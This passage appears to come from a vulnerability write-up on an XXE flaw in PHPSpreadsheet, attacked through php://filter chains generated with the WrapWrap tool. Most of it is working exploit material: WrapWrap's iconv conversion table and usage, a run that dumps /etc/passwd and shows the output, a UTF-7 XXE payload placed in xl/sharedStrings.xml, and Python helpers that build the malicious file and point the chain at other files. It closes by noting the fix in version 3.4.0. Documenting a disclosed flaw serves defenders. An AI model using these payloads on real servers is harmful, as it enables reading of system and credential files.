WrapWrap relies on a series of iconv charset conversions that change how characters are represented, which lets it prepend and append custom data. The following excerpt maps individual characters to the conversion chains used to generate them:
conversions = {
b"0": "convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2",
b"1": "convert.iconv.ISO88597.UTF16|convert.iconv.RK1048.UCS-4LE|convert.iconv.UTF32.CP1167|convert.iconv.CP9066.CSUCS4",
b"2": "convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP949.UTF32BE|convert.iconv.ISO_69372.CSIBM921",
b"3": "convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.ISO6937.8859_4|convert.iconv.IBM868.UTF-16LE",
b"4": "convert.iconv.CP866.CSUNICODE|convert.iconv.CSISOLATIN5.ISO_6937-2|convert.iconv.CP950.UTF-16BE",
b"5": "convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.8859_3.UCS2",
b"6": "convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.CSIBM943.UCS4|convert.iconv.IBM866.UCS-2",
b"7": "convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.iconv.ISO-IR-103.850|convert.iconv.PT154.UCS4",
b"8": "convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2",
b"9": "convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB",
b"A": "convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213",
b"a": "convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE",
b"B": "convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000",
b"b": "convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE",
b"C": "convert.iconv.UTF8.CSISO2022KR",
b"c": "convert.iconv.L4.UTF32|convert.iconv.CP1250.UCS-2",
b"D": "convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213",
b"d": "convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5",
# …
}
WrapWrap takes four positional arguments: the path of the target file, a prefix and a suffix (which shape the payload), and the number of bytes to extract.
python wrapwrap.py --help
usage: wrapwrap.py [-h] [-o OUTPUT] [-p PADDING_CHARACTER] [-f] path prefix suffix nb_bytes
Generates a php://filter wrapper that adds a prefix and a suffix to the contents of a file.
Example:
$ ./wrapwrap.py /etc/passwd '<root><test>' '</test></root>' 100
[*] Dumping 108 bytes from /etc/passwd.
[+] Wrote filter chain to chain.txt (size=88781).
$ php -r 'echo file_get_contents(file_get_contents("chain.txt"));'
<root><test>root:x:0:0:root:/root:/bin/bash=0Adaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin=0Abin:x:2:2:bin:/bin:/usr/</test></root>
positional arguments:
path Path to the file
prefix A string to write before the contents of the file
suffix A string to write after the contents of the file
nb_bytes Number of bytes to dump. It will be aligned with 9
options:
-h, --help show this help message and exit
-o, --output OUTPUT File to write the payload to. Defaults to chain.txt
-p, --padding-character PADDING_CHARACTER
Character to pad the prefix and suffix. Defaults to `M`.
-f, --from-file If set, prefix and suffix indicate files to load their value from, instead of the value itself
We can generate a wrapped payload for /etc/hostname like this:
python wrapwrap.py /etc/hostname "<\!ENTITY xxe '" "'>" 54
[*] Dumping 54 bytes from /etc/hostname.
[+] Wrote filter chain to chain.txt (size=49312).
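The generated chain is close to 50,000 bytes. That is the maximum length libxml2 accepts for the entity's SYSTEM identifier (XML_MAX_NAME_LENGTH, unless the XML_PARSE_HUGE option is set). Because the chain grows with the number of bytes requested, this limit caps how much data a single chain can leak.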
The output of this command is a php://filter chain that looks something like this:
php://filter/convert.base64-encode|convert.base64-encode|convert.iconv.855.UTF7|convert.base64-encode|convert.iconv.855.UTF7|convert.base64-encode|convert.iconv.855.UTF7|convert.base64-decode|convert.iconv.855.UTF7|convert.base64-decode|convert.iconv.855.UTF7|convert.base64-decode|convert.iconv.855.UTF7|convert.base64-decode|convert.quoted-printable-encode|convert.base64-encode|convert.base64-encode|convert.base64-encode|convert.quoted-printable-encode|convert.iconv.855.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.quoted-printable-encode|convert.iconv.855.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.quoted-printable-encode|convert.iconv.855.UTF7|convert.iconv.8859_3.UTF16|
…
convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4|convert.iconv.UTF16BE.866|convert.iconv.MACUKRAINIAN.WCHAR_T|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.base64-decode|dechunk|convert.base64-decode|convert.base64-decode/resource=/etc/hostname
Since the | separators cannot be used as-is in the XML payload, we replace every occurrence of | with /, which php://filter also accepts as a separator between filters. This gives us the final payload to read the /etc/hostname file:
<?xml version="1.0" encoding='UTF-7'?>
+ADw-!DOCTYPE sst [
<!ENTITY % hostname SYSTEM "PHP_FILTER_URL_GENERATED_BY_WRAPWRAP" >
%hostname;
]>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1" uniqueCount="1">
<si>
<t xml:space="preserve">&xxe;</t>
</si>
</sst>
<!--encoding="UTF-8"-->
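The last steps can be scripted: swapping | for /, checking the size, and embedding the chain in the UTF-7 template. The helper below is hypothetical and not part of WrapWrap. Its 50,000-byte ceiling is the libxml2 limit discussed above. The check for + is our own precaution: in a UTF-7 document, + opens an encoded sequence, so a chain containing one would presumably be decoded differently by libxml2.

```python
# Assumed limit, taken from the XML_MAX_NAME_LENGTH value mentioned above
MAX_SYSTEM_LITERAL = 50_000

TEMPLATE = """<?xml version="1.0" encoding='UTF-7'?>
+ADw-!DOCTYPE sst [
<!ENTITY % hostname SYSTEM "{url}" >
%hostname;
]>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1" uniqueCount="1">
<si>
<t xml:space="preserve">&xxe;</t>
</si>
</sst>
<!--encoding="UTF-8"-->"""


def build_shared_strings(chain: str) -> str:
    """Turn a WrapWrap php://filter chain into the sharedStrings.xml payload."""
    url = chain.strip().replace("|", "/")
    if '"' in url:
        raise ValueError("the chain cannot contain a double quote")
    if "+" in url:
        # In a UTF-7 document, "+" starts an encoded sequence
        raise ValueError("the chain cannot contain '+' in a UTF-7 document")
    if len(url) >= MAX_SYSTEM_LITERAL:
        raise ValueError(f"chain is {len(url)} bytes long; dump fewer bytes")
    return TEMPLATE.format(url=url)
```

With the chain saved by WrapWrap in chain.txt, build_shared_strings(open("chain.txt").read()) returns plain ASCII text. Store it as xl/sharedStrings.xml before repackaging the archive.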
To leak other files, such as /etc/passwd, simply replace the target file path at the very end of the php://filter chain.
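Only the trailing path needs to change, and this tiny hypothetical helper does exactly that. Like the text, it assumes that the rest of the chain does not depend on the target file. Presumably the amount of data leaked stays whatever was requested when the chain was generated.

```python
def retarget_chain(chain: str, new_path: str) -> str:
    """Point an existing php://filter chain at a different file."""
    head, sep, _old_path = chain.strip().rpartition("/resource=")
    if not sep:
        raise ValueError("not a php://filter chain: missing '/resource='")
    return head + sep + new_path


chain = "php://filter/convert.base64-encode/convert.base64-decode/resource=/etc/hostname"
print(retarget_chain(chain, "/etc/passwd"))
# php://filter/convert.base64-encode/convert.base64-decode/resource=/etc/passwd
```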
Conclusions
The PHPSpreadsheet team responded swiftly to the vulnerability reports submitted by Antonio Rocco Spataro and Antonio Russo, actively involving them in the remediation process. Starting from version 3.4.0, the library addresses the reported security flaws by completely reworking the affected methods, ensuring a more robust and secure implementation.